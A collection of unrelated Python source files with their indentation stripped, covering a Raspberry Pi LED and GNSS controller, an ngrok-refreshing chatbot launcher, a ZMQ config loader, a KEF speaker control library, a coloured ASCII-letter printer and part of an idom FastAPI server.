SLOW_FLASH = 2
FAST_FLASH = 3
def __init__(self, gpio_pin):
self.__current_state = self.LedStates.OFF
self.__current_led_state = False
self.gpio_pin = gpio_pin
GPIO.setup(self.gpio_pin, GPIO.OUT)
self.__set_off()
def __set_off(self):
self.__current_led_state = False
GPIO.output(self.gpio_pin, False)
def __set_on(self):
self.__current_led_state = True
GPIO.output(self.gpio_pin, True)
def __flash(self, time_on, time_off):
while ((self.get_state() == self.LedStates.SLOW_FLASH) or (self.get_state() == self.LedStates.FAST_FLASH)) :
if self.__current_led_state == True:
self.__set_off()
time.sleep(time_off)
else:
self.__set_on()
time.sleep(time_on)
def set_on(self):
self.__current_state = self.LedStates.ON
self.__set_on()
def set_off(self):
self.__current_state = self.LedStates.OFF
self.__set_off()
def set_slow_flash(self):
self.__current_state = self.LedStates.SLOW_FLASH
self.__time_on = SLOW_FLASH_TIMES[0]
self.__time_off = SLOW_FLASH_TIMES[1]
self.__flashthread = threading.Thread(target=self.__flash, args=(self.__time_on, self.__time_off))
self.__flashthread.start()
def set_fast_flash(self):
self.__current_state = self.LedStates.FAST_FLASH
self.__time_on = FAST_FLASH_TIMES[0]
self.__time_off = FAST_FLASH_TIMES[1]
self.__flashthread = threading.Thread(target=self.__flash, args=(self.__time_on, self.__time_off))
self.__flashthread.start()
def get_state(self):
return self.__current_state
if __name__ == "__main__":
try:
GPIO.setmode(GPIO.BCM)
button = ButtonControl(BUTTON_GPIO_PIN)
button.start()
gnss = GnssControl()
gnss.start()
led = LedControl(LED_GPIO_PIN)
led.set_fast_flash()
while(button.get_state() != button.ButtonPressStates.LONGPRESS):
if (button.get_state() == button.ButtonPressStates.SHORTPRESS):
if(gnss.get_state() == gnss.GnssStates.STOP):
led.set_on()
gnss.set_recording()
elif (gnss.get_state() == gnss.GnssStates.RECORD):
led.set_slow_flash()
gnss.set_paused()
elif (gnss.get_state() == gnss.GnssStates.PAUSE):
led.set_on()
gnss.set_recording()
button.set_not_pressed()
except KeyboardInterrupt:
print "User Cancelled (Ctrl C)"
except:
print "Unexpected error - ", sys.exc_info()[0], sys.exc_info()[1]
raise
finally:
button.stopController()
button.join()
led.set_off()
gnss.set_stopped()
gnss.join()
GPIO.cleanup()
|
botkit_with_auto-refreshed-ngrok.py | #!/usr/bin/env python
"""This is part of the MEA-Calendar Webex-Teams bot functionality.
It overcomes the limitation of the ngrok free account limitation of tunnel expiration every 8 hours,
by automatically stopping the current ngrok and botkit every 7.5 hours and then recreating a new ngrok
session, getting the new session's URL, and restarting botkit using the new URL.
The logic is scheduled to run every 7.5 hours natively within the script. No need for external cron scheduler.
"""
import subprocess
import requests
import json
import time
import schedule
import threading
import sys
__author__ = "Charles Youssef"
__copyright__ = "Copyright 2019 Cisco and/or its affiliates"
__license__ = "CISCO SAMPLE CODE LICENSE"
__version__ = "1.1"
__email__ = "cyoussef@cisco.com"
def bot_run():
# get the new ngrok session URL for the HTTPS session:
ngrok_api_url = "http://localhost:4040/api/tunnels"
ngrok_new_session_response = requests.get(ngrok_api_url).text
#print(ngrok_new_session_response)
ngrok_new_tunnel_url = json.loads(ngrok_new_session_response)['tunnels'][1]['public_url']
time.sleep(10)
print("%s: %s" % (time.asctime(time.localtime(time.time())), "Starting a new bot..."))
command = "PUBLIC_URL=%s node bot.js" % ngrok_new_tunnel_url
subprocess.run(command, shell=True)
def main():
# stop the currently running botkit node:
print("%s: %s" % (time.asctime(time.localtime(time.time())), "Stopping the current bot..."))
stop_ngrok = subprocess.run("pkill -9 node", shell=True)
time.sleep(10)
# stop the currently running ngrok session:
print("%s: %s" % (time.asctime(time.localtime(time.time())), "Stopping the current ngrok session..."))
stop_ngrok = subprocess.run("pkill -9 ngrok".split(), stdout = subprocess.PIPE)
time.sleep(10)
# start a new ngrok session on http port 3000 (used by botkit):
print("%s: %s" % (time.asctime(time.localtime(time.time())), "Starting a new ngrok session..."))
ngrok = subprocess.Popen(['ngrok','http', '3000'], stdout = subprocess.PIPE)
time.sleep(10)
# start a new botkit node as a separate thread, as otherwise the command
# has to be ran with Shell=True and otherwise the program execution is stopped
threading1 = threading.Thread(target=bot_run)
threading1.daemon = True
threading1.start()
if __name__ == "__main__":
# Run the program now then repeatedly every 7hours 30 minutes = 450 minutes
main()
schedule.every(450).minutes.do(main)
while True:
try:
schedule.run_pending()
time.sleep(1)
except (KeyboardInterrupt, EOFError):
sys.exit(1)
|
_config.py | """
Copyright (C) 2021 Intel Corporation
SPDX-License-Identifier: BSD-3-Clause
"""
from envparse import Env
from zmq_integration_lib import InputPortWithEvents, get_outpad
from threading import Thread, RLock
class LoginSessionWatcher(object):
_session_valid = None
_session_id = None
_lock = None
def __init__(self, input_addr, input_topic):
self._lock = RLock()
self.input_port = InputPortWithEvents(input_addr, input_topic)
def run_thread(self):
t = Thread(target=self._watch_for_session_change, daemon=True)
t.start()
def _watch_for_session_change(self):
print("Thread running")
for id, event in self.input_port.data_and_event_generator():
if event == "signin":
self._session_valid = True
self._session_id = id
elif event == "signout":
self._session_valid = False
print("got a signout event")
self._session_id = None
@property
def session_valid(self):
with self._lock:
return self._session_valid
@property
def session_id(self):
with self._lock:
try:
return self._session_id.decode()
except Exception:
return self._session_id
def get_login_watcher():
lw = LoginSessionWatcher(INPUT_ADDR, INPUT_TOPIC)
lw.run_thread()
return lw
def get_output_port():
Outport = get_outpad(OUTPUT_ADDR, OUTPUT_TOPIC)
return Outport
def display_help():
print("The application needs the following environment variables.")
print("INPUT_ADDR, INPUT_TOPIC, OUTPUT_ADDR, OUTPUT_TOPIC")
print("Please set the variables and try again.")
def _validate_env_addr_variable(INPUT_ADDR, OUTPUT_ADDR, AUTHZ_SERVER_ADDR):
for variable in [INPUT_ADDR, OUTPUT_ADDR, AUTHZ_SERVER_ADDR]:
if (
not (type(variable) == str)
or not (len(variable.split()) == 1)
or not (("tcp" in variable.split(":")) or ("ipc" in variable.split(":")))
):
raise ValueError("Please check {} address".format(variable))
def _validate_env_topic_variable(INPUT_TOPIC, OUTPUT_TOPIC, WAKE_UP_WORD):
for variable in [INPUT_TOPIC, OUTPUT_TOPIC, WAKE_UP_WORD]:
if not (type(variable) == str) or not (len(variable.split()) == 1):
raise ValueError("Please check {} topic".format(variable))
def _validate_env_log_level_variable(LOG_LEVEL):
if not LOG_LEVEL.lower() in ["info", "error", "debug"] or not (
len(LOG_LEVEL.split()) == 1
):
raise ValueError("Please provide correct Log level")
def _read_env_variables():
# Can set schema
env = Env(
OUTPUT_ADDR=str,
OUTPUT_TOPIC=str,
INPUT_TOPIC=str,
INPUT_ADDR=str,
AUTHZ_SERVER_ADDR=str,
WAKE_UP_WORD=str,
LOG_LEVEL=dict(cast=str, default="ERROR"),
)
OUTPUT_ADDR = env("OUTPUT_ADDR")
OUTPUT_TOPIC = env("OUTPUT_TOPIC")
INPUT_ADDR = env("INPUT_ADDR")
INPUT_TOPIC = env("INPUT_TOPIC")
AUTHZ_SERVER_ADDR = env("AUTHZ_SERVER_ADDR")
WAKE_UP_WORD = env("WAKE_UP_WORD")
LOG_LEVEL = env("LOG_LEVEL")
# Validate env address variable
_validate_env_addr_variable(INPUT_ADDR, OUTPUT_ADDR, AUTHZ_SERVER_ADDR)
# Validate env topic variable
_validate_env_topic_variable(INPUT_TOPIC, OUTPUT_TOPIC, WAKE_UP_WORD)
# Validate env log level variable
_validate_env_log_level_variable(LOG_LEVEL)
return (
OUTPUT_ADDR,
OUTPUT_TOPIC,
INPUT_ADDR,
INPUT_TOPIC,
AUTHZ_SERVER_ADDR,
WAKE_UP_WORD,
LOG_LEVEL,
)
def get_logger():
import logging
global LOG_LEVEL # string
level = logging.ERROR
if LOG_LEVEL.upper() == "WARNING":
level = logging.WARNING
if LOG_LEVEL.upper() == "DEBUG":
level = logging.DEBUG
if LOG_LEVEL.upper() == "INFO":
level = logging.INFO
logging.basicConfig(
format="%(asctime)s - %(levelname)s - [%(filename)s:%(lineno)s - %(funcName)-20s ] - %(message)s",
level=level,
)
logging.root.setLevel(level)
logger = logging.getLogger()
logger.setLevel(level)
return logger
(
OUTPUT_ADDR,
OUTPUT_TOPIC,
INPUT_ADDR,
INPUT_TOPIC,
AUTHZ_SERVER_ADDR,
WAKE_UP_WORD,
LOG_LEVEL,
) = _read_env_variables()
sample_width = 2
audio_channels = 1
bitrate = 16000
|
__init__.py | #! /usr/bin/env python
"""pykef is the library for interfacing with kef speakers"""
import datetime
import logging
import select
import socket
from enum import Enum
from threading import Semaphore, Thread
from time import sleep, time
_LOGGER = logging.getLogger(__name__)
_VOL_STEP = 0.05 # 5 percent
_RESPONSE_OK = 17
_TIMEOUT = 1.0 # in secs
_KEEP_ALIVE = 1.0 # in secs
_SCALE = 100.0
_RETRIES = 10
_WAIT_FOR_ONLINE_STATE = 30.0
class Volume(Enum):
Mute = "MUTE"
Unmute = "UNMUTE"
class InputSource(Enum):
Wifi = bytes([0x53, 0x30, 0x81, 0x12, 0x82])
Bluetooth = bytes([0x53, 0x30, 0x81, 0x19, 0xAD])
Aux = bytes([0x53, 0x30, 0x81, 0x1A, 0x9B])
Opt = bytes([0x53, 0x30, 0x81, 0x1B, 0x00])
Usb = bytes([0x53, 0x30, 0x81, 0x1C, 0xF7])
def __str__(self):
return {
InputSource.Wifi: "Wifi",
InputSource.Bluetooth: "Bluetooth",
InputSource.Aux: "Aux",
InputSource.Opt: "Opt",
InputSource.Usb: "Usb",
}[self]
@classmethod
def from_str(cls, name):
matches = [s for s in InputSource if str(s).endswith(name)]
return matches[0] if matches else None
class States(Enum):
"""States for the a KefClientDevice."""
Online = 1
Offline = 2
TurningOff = 3
class Cache:
"""Holds some variable and store in cache for some time if set."""
def __init__(self, initial_value, get_function, cache_timeout=1.0):
""" Initialize cache variable holder.
initial_value: The initial value for the cache varaible
cache_timeout: How many secs the cache value should be used before
using a real getter.
"""
self.__value = initial_value
self.__current_timeout = time()
self.__cache_timeout = cache_timeout
self.__get_function = get_function
def get(self):
if self.__current_timeout - time() < 0:
self.__value = self.__get_function()
return self.__value
def set(self, value, update_cache_timeout=True):
if update_cache_timeout:
self.__current_timeout = time() + self.__cache_timeout
self.__value = value
class KefSpeaker:
def __init__(self, host, port):
self.__semaphore = Semaphore()
self.__socket = None
self.__connected = False
self.__last_timestamp = 0
self.__host = host
self.__port = port
self.__state = Cache(None, self.__getState, _WAIT_FOR_ONLINE_STATE)
self.__volume = Cache(None, self.__getVolume)
self.__source = Cache(None, self.__getSource)
self.__update_thread = Thread(target=self.__update, daemon=True)
self.__update_thread.start()
def __refresh_connection(self):
"""Connect if not connected.
Retry at max for 100 times, with longer interval each time.
Update timestamp that keep connection alive.
If unable to connect due to no route to host, set to offline
If speaker is offline, max retires is infinite.
"""
def setup_connection():
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.__socket.settimeout(_TIMEOUT)
return self.__socket
self.__last_timestamp = time()
if not self.__connected:
self.__socket = setup_connection()
self.__connected = False
wait = 0.1
retries = 0
while retries < _RETRIES:
self.__last_timestamp = time()
try:
self.__socket.connect((self.__host, self.__port))
self.__connected = True
_LOGGER.debug("Online")
_LOGGER.debug("Connected")
break
except ConnectionRefusedError:
self.__socket = setup_connection()
wait += 0.1
sleep(wait)
except BlockingIOError: # Connection ingoing
retries = 0
wait = _TIMEOUT
sleep(wait)
except OSError as err: # Host is down
_LOGGER.debug("Offline")
raise ConnectionRefusedError("Speaker is offline") from err
except socket.timeout: # Host went offline (probably)
_LOGGER.debug("Offline")
raise ConnectionRefusedError("Speaker is offline") from err
retries += 1
def __disconnect_if_passive(self):
"""Disconnect if connection is not used for a while (old timestamp)."""
should_disconnect = time() - self.__last_timestamp > _KEEP_ALIVE
if self.__connected and should_disconnect:
self.__connected = False
self.__socket.close()
_LOGGER.debug("Disconneced")
def __update(self):
"""Update speakers, disconnects speakers when passive."""
while 1:
sleep(0.1)
self.__disconnect_if_passive()
def __sendCommand(self, message):
"""Send command to speakers, returns the response."""
self.__refresh_connection()
if self.__connected:
self.__semaphore.acquire()
try:
self.__socket.sendall(message)
self.__socket.setblocking(0)
ready = select.select([self.__socket], [], [], _TIMEOUT)
if ready[0]:
data = self.__socket.recv(1024)
else:
data = None
self.__socket.setblocking(1)
except Exception as err:
raise OSError("__sendCommand failed") from err
finally:
self.__semaphore.release()
else:
raise OSError("__sendCommand failed")
return data[len(data) - 2] if data else None
def __wait_for_online_state(self, time_to_wait=_WAIT_FOR_ONLINE_STATE):
"""Use this function to wait for online state."""
while time_to_wait > 0 and self.__state.get() is not States.Online:
time_to_sleep = 0.1
time_to_wait -= time_to_sleep
sleep(time_to_sleep)
def __getVolume(self, scale=True):
_LOGGER.debug("__getVolume")
msg = bytes([0x47, 0x25, 0x80, 0x6C])
volume = self.__sendCommand(msg)
if volume:
scaled_volume = volume / _SCALE if volume < 128 else Volume.Mute
return scaled_volume if scale else volume
else:
raise ConnectionRefusedError("Cannot fetch volume from speaker")
def __setVolume(self, volume):
_LOGGER.debug("__setVolume: " + "volume:" + str(volume))
if not volume:
return
if volume not in [Volume.Mute, Volume.Unmute]:
set_volume = int(max(0.0, min(1.0, volume)) * _SCALE)
else:
should_mute = volume is Volume.Mute
current_volume = self.__getVolume(scale=False)
if current_volume:
set_volume = int(current_volume) % 128 + (128 * should_mute)
# write vol level in 4th place , add 128 to current level to mute
msg = bytes([0x53, 0x25, 0x81, int(set_volume), 0x1A])
return self.__sendCommand(msg) == _RESPONSE_OK
def __getSource(self):
_LOGGER.debug("__getSource")
msg = bytes([0x47, 0x30, 0x80, 0xD9])
table = {
18: InputSource.Wifi,
25: InputSource.Bluetooth,
26: InputSource.Aux,
27: InputSource.Opt,
28: InputSource.Usb,
31: InputSource.Bluetooth,
}
response = self.__sendCommand(msg)
return table.get(response) if response else None
def __setSource(self, source):
_LOGGER.debug("__setSource: " + "source:" + str(source))
return self.__sendCommand(source.value) == _RESPONSE_OK
def __getState(self):
state = States.Online
try:
self.__refresh_connection()
except Exception:
state = States.Offline
return state
@property
def volume(self):
"""Volume level of the media player (0..1). None if muted"""
value = self.__volume.get()
if value:
self.__volume.set(value, update_cache_timeout=False)
return value
@volume.setter
def volume(self, value):
self.__wait_for_online_state()
success = self.__setVolume(value)
if success and value is not Volume.Unmute:
self.__volume.set(value)
@property
def source(self):
"""Get the input source of the speaker."""
value = self.__source.get()
if value:
self.__source.set(value, update_cache_timeout=False)
return value
@source.setter
def source(self, value):
self.__wait_for_online_state()
success = self.__setSource(value)
if success:
self.__source.set(value)
@property
def muted(self):
return self.volume is Volume.Mute
@muted.setter
def muted(self, value):
self.volume = Volume.Mute if value else Volume.Unmute
@property
def online(self):
return self.__state.get() is States.Online
def turnOff(self):
msg = bytes([0x53, 0x30, 0x81, 0x9B, 0x0B])
success = self.__sendCommand(msg) == _RESPONSE_OK
if success:
self.__state.set(States.TurningOff)
def increaseVolume(self, step=None):
"""Increase volume by step, or 5% by default.
Constrait: 0.0 < step < 1.0.
"""
volume = self.volume
if volume:
step = step if step else _VOL_STEP
self.volume = volume + step
def decreaseVolume(self, step=None):
"""Decrease volume by step, or 5% by default.
Constrait: 0.0 < step < 1.0.
"""
self.increaseVolume(-(step or _VOL_STEP))
|
color pattern with threading.py | import time
import random
from multiprocessing import pool
from playsound import playsound
from threading import Thread
i = -1
l = 0
count = 0
class loops:
def loop(self):
print(" ", end="")
def A(self):
global i
global l
global i
for j in range(i, 5):
for k in range(4, i, -1):
print(" ", end="")
print("*", end="")
if i != 0:
l = 1
for q in range(0, l):
if (i == 3):
print(" *" * 3, end="")
else:
print(" " * (i + (i - 1)), end="*")
for k in range(4, i, -1):
print(" ", end="")
x.loop()
return
def B(self):
global i
for j in range(i, 6):
print("*", end="")
if (i == 0 or i == 2 or i == 4):
print(" *" * 3, end=" ")
else:
print(" " * 6, end="*")
x.loop()
return
def C(self):
global i
for i in range(i, 5):
if (i == 0 or i == 4):
print(" " * 2, end=" *" * 3)
elif (i == 1 or i == 3):
print(" " * 1, end="*")
print(" " * 5, end=" ")
else:
print("*", end=" " *7)
x.loop()
return
def D(self):
global i
for i in range(i, 5):
print("*", end=" ")
if (i == 0 or i == 4):
print("* " * 2, end=" " * 1)
elif (i == 1 or i == 3):
print(" " * 4, end="*")
else:
print(" " * 3, end=" *")
x.loop()
return
def E(self):
global i
for i in range(i, 5):
if (i == 0 or i == 2 or i == 4):
print("* " * 3, end="*")
else:
print("* ", end=" " * 5)
x.loop()
return
def F(self):
global i
for i in range(i, 5):
if (i == 0):
print("* " * 3, end="*")
elif (i == 2):
print("* " * 3, end=" ")
else:
print("* ", end=" " * 5)
x.loop()
return
def G(self):
global i
for i in range(i, 5):
if (i == 0):
print(" " * 2, end=" *" * 3)
print(" ", end="")
elif (i == 4):
print(" " * 2, end=" * " * 2)
print(" ", end="")
elif (i == 1):
print(" " * 1, end="*")
print(" " * 7, end="")
elif (i == 3):
print(" " * 1, end="*")
print(" " * 5, end=" *")
else:
print("*", end=" " * 2)
print(" *" * 3, end="")
x.loop()
return
def H(self):
global i
for i in range(i, 5):
if (i == 2):
print("* " * 3, end="*")
else:
print("*", end=" " * 5)
print("*", end="")
x.loop()
return
def I(self):
global i
for i in range(i, 5):
if (i == 0 or i == 4):
print("* " * 3, end="*")
else:
print(" " * 3, end="*")
print(" " * 3, end="")
x.loop()
return
def J(self):
global i
for i in range(i, 5):
if (i == 0):
print("* " * 3, end="*")
elif (i == 3 or i == 2):
print("* ", end=" *")
print(" " * 3, end="")
elif (i == 4):
print(" ", end="*")
print(" " * 2, end="")
else:
print(" " * 3, end="*")
print(" " * 3, end="")
x.loop()
return
def K(self):
global i
for i in range(i, 5):
if i == 0 or i == 4:
print("*", end=" " * 3)
print("*", end="")
elif i == 1 or i == 3:
print("*", end=" " * 2)
print("* ", end=" ")
else:
print("* ", end=" *")
print(" ", end=" ")
x.loop()
return
def L(self):
global i
for i in range(i,5):
if(i==4):
print("* "*3,end="*")
else:
print("* ",end=" "*5)
x.loop()
return
def M(self):
global i
for i in range(i,5):
print("* ",end="")
if(i==1):
print("* ",end=" * ")
elif(i==2):
print(" "*2,end="* ")
else:
print(" "*3,end="")
print("*",end="")
x.loop()
return
def N(self):
global i
for i in range(i,5):
print("*",end="")
if(i==0 ):
print(" "*3,end="")
else:
print(" "*i,end="*")
print(" "*(5-i),end="")
print("*",end="")
x.loop()
return
def O(self):
global i
for i in range(i,5):
if(i==0 or i==4):
print(" "*4,end="*")
print(" "*3,end=" ")
elif(i==2):
print("*",end=" "*7)
print("*",end="")
else:
print(" ",end="*")
print(" ",end="* ")
x.loop()
return
def P(self):
global i
for i in range(i,5):
print("*",end="")
if(i==0 or i==2):
print(" *"*3,end=" ")
elif(i==1):
print(" "*6,end="*")
else:
print(" "*7,end="")
x.loop()
return
def Q(self):
global i
for i in range(i,5):
if(i==0):
print(" "*4,end="*")
print(" "*3,end=" ")
elif(i==4):
print(" "*4,end="*")
print(" "*3,end="*")
elif(i==2):
print("*",end=" "*7)
print("*",end="")
elif(i==3):
print(" ",end="*")
print(" "*3,end="* * ")
else:
print(" ",end="*")
print(" ",end="* ")
x.loop()
return
def R(self):
global i
for i in range(i,5):
print("*",end="")
if(i==0 or i==2):
print(" *"*3,end=" ")
elif(i==1):
print(" "*6,end="*")
else:
print(" "*i,end=" *")
print(" ",end=" "*(4-i))
x.loop()
return
def S(self):
global i
for i in range(i, 5):
if (i == 0):
print(" " * 2, end="* " * 3)
print("", end="")
elif (i == 4):
print(" ", end="* " * 3)
print("", end="")
elif (i == 1):
print("*", end=" " * 7)
elif (i == 2):
print(" ", end="*")
print(" " * 4, end="")
else:
print("*", end=" " * 6)
print("*", end="")
x.loop()
return
def T(self):
global i
for i in range(i, 5):
if (i == 0):
print("* " * 3, end="*")
else:
print(" " * 2, end=" *")
print(" " * 2, end=" ")
x.loop()
return
def U(self):
global i
for i in range(i, 5):
if (i == 4):
print(" " * 2, end="* " * 2)
print(" " * 2, end="")
elif (i == 3):
print(" ", end="*")
print(" " * 4, end="*")
print(" ", end="")
else:
print("* ", end=" " * 5)
print("*", end="")
x.loop()
return
def V(self):
global i
for i in range(i, 5):
if (i == 0):
print("*", end=" " * 7)
print("*", end="")
elif (i == 1):
print(" *", end=" " * 5)
print("*", end=" ")
elif (i == 2):
print(" *", end=" " * 3)
print("*", end=" ")
elif (i == 3):
print(" *", end=" ")
print("*", end=" ")
else:
print(" " * 4, end="*")
print(" " * 4, end="")
x.loop()
return
def W(self):
global i
for i in range(i, 5):
if (i == 0):
print("*", end=" " * 11)
print("*", end="")
elif i == 1:
print(" *", end=" " * 9)
print("", end="* ")
elif (i == 2):
print(" * ", end=" *")
print(" ", end=" ")
elif (i == 3):
print(" " * 3, end="*")
print(" * * ", end=" " * 2)
else:
print(" " * 3, end=" *")
print(" *", end=" " * 4)
x.loop()
return
def X(self):
global i
for i in range(i, 5):
if (i == 0 or i == 4):
print("*", end=" " * 5)
print("*", end="")
elif (i == 1 or i == 3):
print(" *", end=" " * 3)
print("* ", end="")
else:
print(" " * 3, end="*")
print(" " * 3, end="")
x.loop()
return
def Y(self):
global i
for i in range(i, 5):
if (i == 0):
print("*", end=" " * 5)
print("*", end="")
elif (i == 1):
print(" *", end=" " * 3)
print("* ", end="")
else:
print(" " * 3, end="*")
print(" " * 3, end="")
x.loop()
return
def Z(self):
global i
for i in range(i, 5):
if (i == 0 or i == 4):
print("* " * 3, end="*")
elif (i == 1):
print(" " * 5, end="*")
print(" ", end="")
elif (i == 2):
print(" " * 3, end="*")
print(" " * 2, end=" ")
else:
print(" " * 1, end="*")
print(" " * 3, end=" ")
x.loop()
return
print()
def play():
soun = input("ENTER SOUND")
time.sleep(1.8)
print("\n"*30)
# CHANGE DIRECTORY HERE ................................................................
playsound("C:\\Users\\chetan\\Desktop\\language\\playsound\\" + soun + ".mp3")
# CHANGE DIRECTORY HERE.................................................................
time.sleep(1.1)
x = loops()
# DRIVER CODE
n = input("ENTER YOUR TEXT")
print("type any song name from here ...")
lis=["birth",'rider','standard','teri mitti me','chitrakaar']
print(lis)
#WE CAN ADD birthday and rider SONG HERE
thread=Thread(target=play)
thread.start()
time.sleep(7)
k = len(n)
aa,bb,cc,dd,ee,ff,gg,hh,ii,jj,kk,ll,mm,nn,oo,pp,qq,rr,ss,tt,uu,vv,ww,xx,yy,zz=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
s=0.5
list=[30,31,32,33,34,35,36,37]
color=0
for o in range(5):
i = i + 1
for f in range(k):
if (n[f] == "A" or n[f] == "a"):
if(aa==0):
aa=random.choice(list)
aa=aa+1
print("\033[1;{}m".format(aa),end="")
time.sleep(s)
x.A()
elif (n[f] == "B" or n[f] == "b"):
if(bb==0):
bb=random.choice(list)
bb=bb+1
print("\033[1;{}m".format(bb),end="")
time.sleep(s)
x.B()
elif (n[f] == "C" or n[f] == "c"):
if(cc==0):
cc=random.choice(list)
cc=cc+1
print("\033[1;{}m".format(cc),end="")
time.sleep(s)
x.C()
elif (n[f] == "D" or n[f] == "d"):
if(dd==0):
dd=random.choice(list)
dd=dd+1
print("\033[1;{}m".format(dd),end="")
time.sleep(s)
x.D()
elif (n[f] == "E" or n[f] == "e"):
if(ee==0):
ee=random.choice(list)
ee=ee+1
print("\033[1;{}m".format(ee),end="")
time.sleep(s)
x.E()
elif (n[f] == "F" or n[f] == "f"):
if(ff==0):
ff=random.choice(list)
ff=ff+1
print("\033[1;{}m".format(ff),end="")
time.sleep(s)
x.F()
elif (n[f] == "G" or n[f] == "g"):
if(gg==0):
gg=random.choice(list)
gg=gg+1
print("\033[1;{}m".format(gg),end="")
time.sleep(s)
x.G()
elif (n[f] == "H" or n[f] == "h"):
if(hh==0):
hh=random.choice(list)
hh=hh+1
print("\033[1;{}m".format(hh),end="")
time.sleep(s)
x.H()
elif (n[f] == "I" or n[f] == "i"):
if(ii==0):
ii=random.choice(list)
ii=ii+1
print("\033[1;{}m".format(ii),end="")
time.sleep(s)
x.I()
elif (n[f] == "J" or n[f] == "j"):
if(jj==0):
jj=random.choice(list)
jj=jj+1
print("\033[1;{}m".format(jj),end="")
time.sleep(s)
x.J()
elif (n[f] == "K" or n[f] == "k"):
if(kk==0):
kk=random.choice(list)
kk=kk+1
print("\033[1;{}m".format(kk),end="")
time.sleep(s)
x.K()
elif (n[f] == "L" or n[f] == "l"):
if(ll==0):
ll=random.choice(list)
ll=ll+1
print("\033[1;{}m".format(ll),end="")
time.sleep(s)
x.L()
elif (n[f] == "m" or n[f] == "M"):
if(mm==0):
mm=random.choice(list)
mm=mm+1
print("\033[1;{}m".format(mm),end="")
time.sleep(s)
x.M()
elif (n[f] == "N" or n[f] == "n"):
if(nn==0):
nn=random.choice(list)
nn=nn+1
print("\033[1;{}m".format(nn),end="")
time.sleep(s)
x.N()
elif (n[f] == "O" or n[f] == "o"):
if(oo==0):
oo=random.choice(list)
oo=oo+1
print("\033[1;{}m".format(oo),end="")
time.sleep(s)
x.O()
elif (n[f] == "P" or n[f] == "p"):
if(pp==0):
pp=random.choice(list)
pp=pp+1
print("\033[1;{}m".format(pp),end="")
time.sleep(s)
x.P()
elif (n[f] == "q" or n[f] == "Q"):
if(qq==0):
qq=random.choice(list)
qq=qq+1
print("\033[1;{}m".format(qq),end="")
time.sleep(s)
x.Q()
elif (n[f] == "R" or n[f] == "r"):
if(rr==0):
rr=random.choice(list)
rr=rr+1
print("\033[1;{}m".format(rr),end="")
time.sleep(s)
x.R()
elif (n[f] == "S" or n[f] == "s"):
if(ss==0):
ss=random.choice(list)
ss=ss+1
print("\033[1;{}m".format(ss),end="")
time.sleep(s)
x.S()
elif (n[f] == "T" or n[f] == "t"):
if(tt==0):
tt=random.choice(list)
tt=tt+1
print("\033[1;{}m".format(tt),end="")
time.sleep(s)
x.T()
elif (n[f] == "U" or n[f] == "u"):
if(uu==0):
uu=random.choice(list)
uu=uu+1
print("\033[1;{}m".format(uu),end="")
time.sleep(s)
x.U()
elif (n[f] == "V" or n[f] == "v"):
if(vv==0):
vv=random.choice(list)
vv=vv+1
print("\033[1;{}m".format(vv),end="")
time.sleep(s)
x.V()
elif (n[f] == "W" or n[f] == "w"):
if(ww==0):
ww=random.choice(list)
ww=ww+1
print("\033[1;{}m".format(ww),end="")
time.sleep(s)
x.W()
elif (n[f] == "X" or n[f] == "x"):
if(xx==0):
xx=random.choice(list)
xx=xx+1
print("\033[1;{}m".format(xx),end="")
time.sleep(s)
x.X()
elif (n[f] == "Y" or n[f] == "y"):
if(yy==0):
yy=random.choice(list)
yy=yy+1
print("\033[1;{}m".format(yy),end="")
time.sleep(s)
x.Y()
elif (n[f] == "Z" or n[f] == "z"):
if(zz==0):
zz=random.choice(list)
zz=zz+1
print("\033[1;{}m".format(zz),end="")
time.sleep(s)
x.Z()
elif(n[f]==" "):
x.loop()
x.loop()
print()
time.sleep(6)
print("\n"*8)
print('THANK YOU ', end='', flush=True)
for x in range(8):
for frame in r'-\|/-\|/':
print('\b', frame, sep='', end='', flush=True)
time.sleep(0.2)
print('\b ')
thread.join()
|
fastapi.py | import json
import logging
import sys
import time
import uuid
from threading import Event, Thread
from typing import Any, Dict, Optional, Tuple, Type, Union, cast
from fastapi import APIRouter, FastAPI, Request, WebSocket
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import RedirectResponse
from fastapi.staticfiles import StaticFiles
from mypy_extensions import TypedDict
from starlette.websockets import WebSocketDisconnect
from uvicorn.config import Config as UvicornConfig
from uvicorn.server import Server as UvicornServer
from uvicorn.supervisors.multiprocess import Multiprocess
from uvicorn.supervisors.statreload import StatReload as ChangeReload
from idom.config import IDOM_CLIENT_BUILD_DIR
from idom.core.dispatcher import (
AbstractDispatcher,
RecvCoroutine,
SendCoroutine,
SharedViewDispatcher,
SingleViewDispatcher,
)
from idom.core.layout import Layout, LayoutEvent, LayoutUpdate
from .base import AbstractRenderServer
logger = logging.getLogger(__name__)
class Config(TypedDict, total=False):
"""Config for :class:`FastApiRenderServer`"""
cors: Union[bool, Dict[str, Any]]
url_prefix: str
serve_static_files: bool
redirect_root_to_index: bool
class FastApiRenderServer(AbstractRenderServer[FastAPI, Config]):
"""Base ``sanic`` extension."""
_dispatcher_type: Type[AbstractDispatcher]
_server: UvicornServer
def stop(self, timeout: float = 3) -> None:
"""Stop the running application"""
self._server.should_exit
if self._daemon_thread is not None:
self._daemon_thread.join(timeout)
def _create_config(self, config: Optional[Config]) -> Config:
new_config: Config = {
"cors": False,
"url_prefix": "",
"serve_static_files": True,
"redirect_root_to_index": True,
**(config or {}), # type: ignore
}
return new_config
def _default_application(self, config: Config) -> FastAPI:
return FastAPI()
def _setup_application(self, config: Config, app: FastAPI) -> None:
router = APIRouter(prefix=config["url_prefix"])
self._setup_api_router(config, router)
self._setup_static_files(config, app)
cors_config = config["cors"]
if cors_config: # pragma: no cover
cors_params = (
cors_config
if isinstance(cors_config, dict)
else {"allow_origins": ["*"]}
)
app.add_middleware(CORSMiddleware, **cors_params)
app.include_router(router)
def _setup_application_did_start_event(
self, config: Config, app: FastAPI, event: Event
) -> None:
def target() -> None:
while not hasattr(self, "_server") or not self._server.started:
time.sleep(1e-3)
event.set()
Thread(target=target, daemon=True).start()
def _setup_api_router(self, config: Config, router: APIRouter) -> None:
"""Add routes to the application blueprint"""
@router.websocket("/stream")
async def model_stream(socket: WebSocket) -> None:
await socket.accept()
async def sock_send(value: LayoutUpdate) -> None:
await socket.send_text(json.dumps(value))
async def sock_recv() -> LayoutEvent:
return LayoutEvent(**json.loads(await socket.receive_text()))
try:
await self._run_dispatcher(
